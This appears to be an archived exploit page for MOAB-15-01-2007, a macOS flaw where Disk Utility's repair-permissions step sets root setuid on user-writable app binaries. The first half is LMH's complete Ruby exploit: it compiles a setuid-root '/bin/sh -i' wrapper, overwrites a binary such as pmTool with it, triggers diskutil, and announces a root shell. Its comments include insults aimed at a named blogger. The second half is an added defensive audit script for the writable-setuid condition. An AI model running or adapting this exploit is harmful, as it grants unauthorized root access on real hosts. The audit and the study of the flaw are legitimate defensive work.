MOAB-15-01-2007.rb.txt

Reported 20 Jan 2007 by LMH. Source: packetstorm (packetstormsecurity.com).

This Ruby script exploits a vulnerability (MOAB-15-01-2007) to replace a specific system binary with a root shell backdoor, relying on the fact that Disk Utility's "repair permissions" operation sets the root setuid bit on a binary that is writable by an ordinary user. It also creates a back-up of the original file and prints instructions for restoring it.

Code
```ruby
#!/usr/bin/ruby
# Exploit for MOAB-15-01-2007
# (c) 2006 LMH <lmh [at] info-pull.com>.
#
# Note: It's a generic exploit, you can use it over any binary writable which
# is set as root setuid by diskutil repair permissions. Simply change the path.
# Blame Apple for doing such a piece of **** and relying on flawed DAC.
#
# Line-noise: Jackass of the Week
# -------
# On Jan 14, 11:10 pm, "William A. Carrel" <[email protected]> wrote:
# > Works for me. I see yesterday's was an HFS+ panic.
# > > Is the info-pull/MoAB/MoKB site down, or is it just me that can't
# > > access it?
# Sorry, my fault. I blocked access to it at this end when they started
# distributing malware so that nobody downloaded anything accidentally. I
# can see it again now.
#
# Kind regards,
#
# Alastair.
# --------
#
# Hmm, false, it was the other way around:
#
# target prot opt source destination
# (...)
# DROP all -- ajhoughton.plus.com anywhere
# (...)
#
# "LMH's continued propensity for insults, which frankly I don't particularly
# appreciate." -- http://alastairs-place.net/2007/01/how-childish/
#
# There's nothing wrong about embarrassing you for being an absurd liar.
# Live with it, and then post to your 'blog' as usual. Free Zealot Apple PR (tm).
#

require 'fileutils'

# diskutil repairPermissions restores the "expected" ownership and mode of the
# target, which includes root ownership and the setuid bit.
DISK_UTIL_COMMAND = "/usr/sbin/diskutil repairPermissions /"
AVAILABLE_TARGETS = [
  "/Applications/Utilities/Activity Monitor.app/Contents/Resources/pmTool",
  "/Applications/Utilities/Keychain Access.app/Contents/Resources/kcproxy",
  "/Applications/Utilities/ODBC Administrator.app/Contents/Resources/iodbcadmintool"
]

# Target index comes from the first argument; defaults to the first entry.
path_to_bin = (AVAILABLE_TARGETS[ARGV[0].to_i] || AVAILABLE_TARGETS[0])
path_to_back = File.join("/tmp", File.basename(path_to_bin))

puts "++ Starting: #{path_to_bin}"
puts "++ Back-up: #{path_to_back}"

# Keep a copy of the original binary so it can be restored afterwards.
if File.exist?(path_to_bin)
  unless File.exist?(path_to_back)
    FileUtils.cp(path_to_bin, path_to_back)
  end
end

puts "++ Compiling a shell wrapper at /tmp/o..."
WRAP_CODE = 'int main() { setuid(0); setgid(0); seteuid(0); system("/bin/sh -i"); }'
COMPILE = "echo '#{WRAP_CODE}' > /tmp/t.c && gcc /tmp/t.c -s -o /tmp/o && rm -rf /tmp/t.c"
system(COMPILE)

puts "++ Placing backdoor..."
FileUtils.mv("/tmp/o", path_to_bin)
system(DISK_UTIL_COMMAND)

puts "++ Finished. Backup at #{path_to_back}."
puts "++ Repair with: mv '#{path_to_back}' '#{path_to_bin}'"
puts "++ Enjoy root shell."
```
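The weakness the script relies on is a binary that an unprivileged or admin user can overwrite and that a privileged tool later marks root-setuid. The following audit is an added example written for this page (it is not part of LMH's exploit or of the Vulners page): it inspects each of the three paths the exploit names, reports whether the file is currently setuid, whether it is owned by root, and whether group or world write bits are set, and flags any file that a non-root principal can replace. The `demo_audit` function builds two sample files in a temporary directory (constructed, not real system binaries) so the check can be run on any Unix host; the target list is copied from the script above, and everything else (function names, the `:risky` rule) is this example's own.

```ruby
#!/usr/bin/env ruby
# Added example: audit binaries for the "writable now, root-setuid later"
# condition exploited by MOAB-15-01-2007. Not part of the original exploit.
require 'tmpdir'

# Paths taken from the exploit's AVAILABLE_TARGETS list.
MOAB_TARGETS = [
  "/Applications/Utilities/Activity Monitor.app/Contents/Resources/pmTool",
  "/Applications/Utilities/Keychain Access.app/Contents/Resources/kcproxy",
  "/Applications/Utilities/ODBC Administrator.app/Contents/Resources/iodbcadmintool"
].freeze

# Returns a findings hash for one path, or nil when the file does not exist.
# A file is flagged :risky when someone other than root could replace its
# contents: it is not root-owned, or it carries group/world write bits. Such a
# file becomes a root backdoor the moment a repair-permissions pass sets setuid.
def audit_setuid_target(path)
  return nil unless File.exist?(path)
  st = File.stat(path)
  mode = st.mode # includes file-type bits; we mask the ones we care about
  finding = {
    path: path,
    setuid: (mode & 0o4000) != 0,
    owner_root: st.uid == 0,
    group_writable: (mode & 0o020) != 0,
    world_writable: (mode & 0o002) != 0
  }
  finding[:risky] = !finding[:owner_root] ||
                    finding[:group_writable] ||
                    finding[:world_writable]
  finding
end

# Audit a list of paths; missing files are reported as nil entries.
def audit_targets(paths)
  paths.map { |p| [p, audit_setuid_target(p)] }.to_h
end

# Constructed demonstration: two sample files with the modes that matter.
def demo_audit
  Dir.mktmpdir("moab-audit") do |dir|
    loose = File.join(dir, "pmTool-group-writable") # constructed sample
    tight = File.join(dir, "pmTool-owner-only")     # constructed sample
    [loose, tight].each { |f| File.write(f, "#!/bin/sh\n") }
    File.chmod(0o4775, loose) # setuid + group-writable: the exploitable shape
    File.chmod(0o4755, tight) # setuid, writable by the owner only
    { loose: audit_setuid_target(loose), tight: audit_setuid_target(tight) }
  end
end

if __FILE__ == $0
  audit_targets(MOAB_TARGETS).each do |path, f|
    if f.nil?
      puts "missing: #{path}"
    else
      flag = f[:risky] ? "RISKY" : "ok"
      puts "#{flag}: #{path} setuid=#{f[:setuid]} root=#{f[:owner_root]} " \
           "g+w=#{f[:group_writable]} o+w=#{f[:world_writable]}"
    end
  end
  demo_audit.each { |name, f| puts "demo #{name}: risky=#{f[:risky]}" }
end
```

Run it as an ordinary user on the host being checked; the `tight` sample is flagged only when the process is not root, because a file owned by the auditing user is by definition replaceable by that user. On a production macOS host the interesting output is any `RISKY` line for a real path, which is the condition to fix (restore root ownership and strip group/world write) before any permissions-repair tool runs.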
